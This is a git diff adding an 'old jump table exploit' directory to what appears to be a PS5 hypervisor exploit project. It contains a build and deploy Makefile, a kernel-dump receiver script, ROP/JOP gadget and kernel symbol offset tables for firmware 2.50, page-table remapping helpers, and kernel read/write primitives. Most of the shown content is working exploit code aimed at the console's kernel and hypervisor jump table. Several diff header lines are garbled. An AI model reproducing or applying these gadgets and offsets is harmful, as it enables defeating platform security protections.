manoma080
diff --git a/‎_old_jump_table_exploit/Makefile
+31 b/‎_old_jump_table_exploit/Makefile
+31
diff --git a/‎_old_jump_table_exploit/dump_kernel.py
+44 b/‎_old_jump_table_exploit/dump_kernel.py
+44
diff --git a/‎include/bump_alloc.h ‎_old_jump_table_exploit/include/bump_alloc.h b/‎include/bump_alloc.h ‎_old_jump_table_exploit/include/bump_alloc.h
diff --git a/‎_old_jump_table_exploit/include/config.h
+24 b/‎_old_jump_table_exploit/include/config.h
+24
diff --git a/‎_old_jump_table_exploit/include/debug_log.h
+15 b/‎_old_jump_table_exploit/include/debug_log.h
+15
diff --git a/‎_old_jump_table_exploit/include/kdlsym.h
+44 b/‎_old_jump_table_exploit/include/kdlsym.h
+44
diff --git a/‎include/krop.h ‎_old_jump_table_exploit/include/krop.h b/‎include/krop.h ‎_old_jump_table_exploit/include/krop.h
diff --git a/‎include/mirror.h ‎_old_jump_table_exploit/include/mirror.h b/‎include/mirror.h ‎_old_jump_table_exploit/include/mirror.h
diff --git a/‎include/notify.h ‎_old_jump_table_exploit/include/notify.h b/‎include/notify.h ‎_old_jump_table_exploit/include/notify.h
diff --git a/‎include/offsets/2_00.h ‎_old_jump_table_exploit/include/offsets/2_00.h b/‎include/offsets/2_00.h ‎_old_jump_table_exploit/include/offsets/2_00.h
diff --git a/‎_old_jump_table_exploit/include/offsets/2_50.h
+37 b/‎_old_jump_table_exploit/include/offsets/2_50.h
+37
diff --git a/‎_old_jump_table_exploit/include/paging.h
+59 b/‎_old_jump_table_exploit/include/paging.h
+59
diff --git a/‎_old_jump_table_exploit/include/util.h
+18 b/‎_old_jump_table_exploit/include/util.h
+18
diff --git a/‎src/bump_alloc.c ‎_old_jump_table_exploit/src/bump_alloc.c b/‎src/bump_alloc.c ‎_old_jump_table_exploit/src/bump_alloc.c
diff --git a/‎_old_jump_table_exploit/src/kdlsym.c
+74 b/‎_old_jump_table_exploit/src/kdlsym.c
+74
diff --git a/‎src/krop.c ‎_old_jump_table_exploit/src/krop.c b/‎src/krop.c ‎_old_jump_table_exploit/src/krop.c
@@ -0,0 +1,31 @@
+PS5_HOST ?= ps5
+PS5_PORT ?= 9021
+
+ifdef PS5_PAYLOAD_SDK
+    include $(PS5_PAYLOAD_SDK)/toolchain/prospero.mk
+else
+    $(error PS5_PAYLOAD_SDK is undefined)
+endif
+
+ELF := byepervisor_old.elf
+
+CFLAGS := -Wall -Werror -g -I./include
+
+all: $(ELF)
+
+$(ELF): src/main.c src/bump_alloc.c src/kdlsym.c src/krop.c src/mirror.c src/notify.c src/paging.c src/util.c
+	$(CC) $(CFLAGS) -o $@ $^
+
+clean:
+	rm -f $(ELF)
+
+test: $(ELF)
+	$(PS5_DEPLOY) -h $(PS5_HOST) -p $(PS5_PORT) $^
+
+debug: $(ELF)
+	gdb \
+	-ex "target extended-remote $(PS5_HOST):2159" \
+	-ex "file $(ELF)" \
+	-ex "remote put $(ELF) /data/$(ELF)" \
+	-ex "set remote exec-file /data/$(ELF)" \
+	-ex "start"
@@ -0,0 +1,44 @@
+import socket
+import struct
+import time
+
+# Console info
+CONSOLE_IP   = "10.0.0.217"
+CONSOLE_PORT = 9003
+
+with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
+    s.connect((CONSOLE_IP, CONSOLE_PORT))
+
+    dump_data = bytearray()
+    first_packet_recv = False
+    first_packet_time = time.monotonic()
+    s.settimeout(60)
+    while True:
+        try:
+            data = s.recv(0x1000)
+            if not data:
+                break
+            if not first_packet_recv:
+                first_packet_recv = True
+                first_packet_time = time.monotonic()
+
+            dump_data.extend(data)
+            data_recv = len(dump_data)
+
+            kbps = 0
+            if first_packet_time != time.monotonic():
+                kbps = round(data_recv / (time.monotonic() - first_packet_time) / 1024)
+
+            print("Received {} bytes ({} kb/s)...".format(data_recv, kbps))
+
+            # If data received has exceeded 200MB, exit for safety
+            if len(dump_data) > 0xC800000:
+                break
+        except socket.timeout:
+            print("Timeout reached for receiving data (1 min)")
+            break
+
+    dump_file = open("./kernel_dump.bin", "wb")
+    dump_file.write(dump_data)
+    dump_file.close()
+    s.close()
@@ -0,0 +1,24 @@
+#ifndef CONFIG_H
+#define CONFIG_H
+
+/*
+ * Enable debug logging via TCP connection to PC
+ */
+#define PC_DEBUG_ENABLED                    1
+
+/*
+ * PC IP address for debug logging
+ */
+#define PC_DEBUG_IP                         "10.0.0.143"
+
+/*
+ * PC IP port for debug logging
+ */
+#define PC_DEBUG_PORT                       5655
+
+/*
+ * TCP port to run the RPC server on
+ */
+#define RPC_TCP_PORT                        9002
+
+#endif // CONFIG_H
@@ -0,0 +1,15 @@
+#ifndef DEBUG_LOG_H
+#define DEBUG_LOG_H
+
+extern int g_debug_sock;
+
+#define SOCK_LOG(format, ...)                                          \
+{                                                                            \
+    char _macro_printfbuf[512];                                              \
+    int _macro_size = sprintf(_macro_printfbuf, format, ##__VA_ARGS__);      \
+    write(g_debug_sock, _macro_printfbuf, _macro_size);                             \
+} while(0);
+
+void DumpHex(const void* data, size_t size);
+
+#endif // DEBUG_LOG_H
@@ -0,0 +1,44 @@
+#pragma once
+#ifndef KDLSYM_H
+#define KDLSYM_H
+
+typedef enum {
+    KERNEL_SYM_DMPML4I,
+    KERNEL_SYM_DMPDPI,
+    KERNEL_SYM_PML4PML4I,
+    KERNEL_SYM_DATA_CAVE,
+    KERNEL_SYM_PMAP_STORE,
+    KERNEL_SYM_HV_JMP_TABLE,
+    KERNEL_SYM_HIJACKED_FUNC_PTR,
+    KERNEL_SYM_MAX
+} ksym_t;
+
+typedef enum {
+    KERNEL_GADGET_RET,
+    KERNEL_GADGET_INFLOOP,
+    KERNEL_GADGET_HYPERCALL_SET_CPUID_PS4,
+    KERNEL_GADGET_RETURN_ADDR,
+    KERNEL_GADGET_POP_RDI,
+    KERNEL_GADGET_POP_RSI,
+    KERNEL_GADGET_POP_RDX,
+    KERNEL_GADGET_POP_RAX,
+    KERNEL_GADGET_POP_RBX,
+    KERNEL_GADGET_ADD_RAX_RDX,
+    KERNEL_GADGET_MOV_R9_QWORD_PTR_RDI_48,
+    KERNEL_GADGET_POP_R12,
+    KERNEL_GADGET_MOV_QWORD_PTR_RDI_RSI,
+    KERNEL_GADGET_POP_RSP,
+    KERNEL_GADGET_MOV_RAX_QWORD_PTR_RAX,
+    KERNEL_GADGET_MOV_QWORD_PTR_RAX_0,
+    KERNEL_GADGET_SETJMP,
+    KERNEL_GADGET_LONGJMP,
+    KERNEL_GADGET_JOP1,
+    KERNEL_GADGET_JOP2,
+    KERNEL_GADGET_MAX
+} kgadget_t;
+
+uint64_t kdlsym(ksym_t sym);
+uint64_t kdlgadget(kgadget_t gadget);
+uint64_t ktext(uint64_t offset);
+
+#endif // KDLSYM_H
@@ -0,0 +1,37 @@
+#ifndef OFFSETS_2_50_H
+#define OFFSETS_2_50_H
+
+uint64_t g_sym_map_250[] = {
+    0x4CB3B50,          // KERNEL_SYM_DMPML4I
+    0x4CB3B54,          // KERNEL_SYM_DMPDPI
+    0x4CB38AC,          // KERNEL_SYM_PML4PML4I
+    0x248E7EC,          // KERNEL_SYM_DATA_CAVE
+    0x4CB38C8,          // KERNEL_SYM_PMAP_STORE
+    0x245BEE0,          // KERNEL_SYM_HV_JMP_TABLE
+    0x248EBB0,          // KERNEL_SYM_HIJACKED_JMP_PTR
+};
+
+uint64_t g_gadget_map_250[] = {
+    0x167001,           // KERNEL_GADGET_RET
+    0x16ADB2,           // KERNEL_GADGET_INFLOOP
+    0xAE02D0,           // KERNEL_GADGET_HYPERCALL_SET_CPUID_PS4
+    0xAE093F,           // KERNEL_GADGET_RETURN_ADDR
+    0x1A6638,           // KERNEL_GADGET_POP_RDI
+    0x1671F0,           // KERNEL_GADGET_POP_RSI
+    0x2D79B8,           // KERNEL_GADGET_POP_RDX
+    0x1C3290,           // KERNEL_GADGET_POP_RAX
+    0x172A5F,           // KERNEL_GADGET_POP_RBX
+    0x201D59,           // KERNEL_GADGET_ADD_RAX_RDX
+    0x672D37,           // KERNEL_GADGET_MOV_R9_QWORD_PTR_RDI_48
+    0x62D1A1,           // KERNEL_GADGET_POP_R12
+    0x3B2906,           // KERNEL_GADGET_MOV_QWORD_PTR_RDI_RSI
+    0x1C2858,           // KERNEL_GADGET_POP_RSP
+    0x16B350,           // KERNEL_GADGET_MOV_RAX_QWORD_PTR_RAX
+    0x16B4F7,           // KERNEL_GADGET_MOV_QWORD_PTR_RAX_0
+    0x2486B0,           // KERNEL_GADGET_SETJMP
+    0x2486E0,           // KERNEL_GADGET_LONGJMP
+    0xB5D9AC,           // KERNEL_GADGET_JOP1
+    0x21A36B,           // KERNEL_GADGET_JOP2
+};
+
+#endif // OFFSETS_2_50_H
@@ -0,0 +1,59 @@
+#ifndef PAGING_H
+#define PAGING_H
+
+enum pde_shift {
+    PDE_PRESENT = 0,
+    PDE_RW,
+    PDE_USER,
+    PDE_WRITE_THROUGH,
+    PDE_CACHE_DISABLE,
+    PDE_ACCESSED,
+    PDE_DIRTY,
+    PDE_PS,
+    PDE_GLOBAL,
+    PDE_XOTEXT = 58,
+    PDE_PROTECTION_KEY = 59,
+    PDE_EXECUTE_DISABLE = 63
+};
+
+#define PDE_PRESENT_MASK                1UL
+#define PDE_RW_MASK                     1UL
+#define PDE_USER_MASK                   1UL
+#define PDE_WRITE_THROUGH_MASK          1UL
+#define PDE_CACHE_DISABLE_MASK          1UL
+#define PDE_ACCESSED_MASK               1UL
+#define PDE_DIRTY_MASK                  1UL
+#define PDE_PS_MASK                     1UL
+#define PDE_GLOBAL_MASK                 1UL
+#define PDE_XOTEXT_MASK                 1UL
+#define PDE_PROTECTION_KEY_MASK         0xFUL
+#define PDE_EXECUTE_DISABLE_MASK        1UL
+#define PDE_ADDR_MASK                   0xffffffffff800ULL  // bits [12, 51]
+
+#define PDE_FIELD(pde, name)            (((pde) >> PDE_##name) & PDE_##name##_MASK)
+#define PDE_ADDR(pde)                   (pde & PDE_ADDR_MASK)
+#define SET_PDE_FIELD(pde, name, val)   (pde |= (val << PDE_##name))
+#define SET_PDE_BIT(pde, name)          (pde |= (PDE_##name##_MASK << PDE_##name))
+#define CLEAR_PDE_BIT(pde, name)        (pde &= ~(PDE_##name##_MASK << PDE_##name))
+#define SET_PDE_ADDR(pde, addr)         do { \
+                                            pde &= ~(PDE_ADDR_MASK); \
+                                            pde |= (addr & PDE_ADDR_MASK); \
+                                        } while (0)
+
+#define KERNEL_OFFSET_PROC_P_VMSPACE    0x200
+#define KERNEL_OFFSET_VMSPACE_VM_PMAP   0x1D0
+#define KERNEL_OFFSET_PMAP_PM_PML4      0x020
+
+uint64_t get_proc_pmap();
+uint64_t pmap_kextract(uint64_t va);
+uint64_t get_dmap_addr(uint64_t pa);
+
+uint64_t find_pml4e(uint64_t pmap, uint64_t va, uint64_t *out_pml4e);
+uint64_t find_pdpe(uint64_t pmap, uint64_t va, uint64_t *out_pdpe);
+uint64_t find_pde(uint64_t pmap, uint64_t va, uint64_t *out_pde);
+uint64_t find_pte(uint64_t pmap, uint64_t va, uint64_t *out_pte);
+
+int downgrade_kernel_superpages(uint64_t va, uint64_t kernel_pt_addr);
+uint64_t remap_page(uint64_t pmap, uint64_t va, uint64_t new_pa);
+
+#endif // PAGING_H
@@ -0,0 +1,18 @@
+#ifndef UTIL_H
+#define UTIL_H
+
+// Core pinning
+int pin_to_core(int num);
+void pin_to_first_available_core();
+int get_cpu_core();
+
+// Kernel read/write
+void kernel_write8(uint64_t addr, uint64_t val);
+void kernel_write4(uint64_t addr, uint32_t val);
+uint64_t kernel_read8(uint64_t addr);
+uint32_t kernel_read4(uint64_t addr);
+
+// Dumping
+void DumpHex(const void* data, size_t size);
+
+#endif // UTIL_H
@@ -0,0 +1,74 @@
+#include <sys/types.h>
+#include <ps5/kernel.h>
+
+#include "debug_log.h"
+#include "kdlsym.h"
+
+#include "offsets/2_00.h"
+#include "offsets/2_50.h"
+
+uint64_t g_fw_version;
+uint64_t g_kernel_base = 0;
+
+void init_kdlsym()
+{
+    // Set firmware version
+    g_fw_version    = kernel_get_fw_version() & 0xFFFF0000;
+
+    // Resolve symbols
+    switch (g_fw_version) {
+    case 0x2000000:
+    case 0x2500000:
+        g_kernel_base = KERNEL_ADDRESS_DATA_BASE - 0x1B80000;
+        break;
+    }
+}
+
+uint64_t ktext(uint64_t offset)
+{
+    // Init kdlsym if it's not initialized already
+    if (g_kernel_base == 0)
+        init_kdlsym();
+
+    return g_kernel_base + offset;
+}
+
+uint64_t kdlsym(ksym_t sym)
+{
+    // Init kdlsym if it's not initialized already
+    if (g_kernel_base == 0)
+        init_kdlsym();
+
+    // Don't overflow sym table
+    if (sym >= KERNEL_SYM_MAX)
+        return 0;
+
+    switch (g_fw_version) {
+    case 0x2000000:
+        return g_kernel_base + g_sym_map_200[sym];
+    case 0x2500000:
+        return g_kernel_base + g_sym_map_250[sym];
+    }
+
+    return 0;
+}
+
+uint64_t kdlgadget(kgadget_t gadget)
+{
+    // Init kdlsym if it's not initialized already
+    if (g_kernel_base == 0)
+        init_kdlsym();
+
+    // Don't overflow gadget table
+    if (gadget >= KERNEL_GADGET_MAX)
+        return 0;
+
+    switch (g_fw_version) {
+    case 0x2000000:
+        return g_kernel_base + g_gadget_map_200[gadget];
+    case 0x2500000:
+        return g_kernel_base + g_gadget_map_250[gadget];
+    }
+
+    return 0;
+}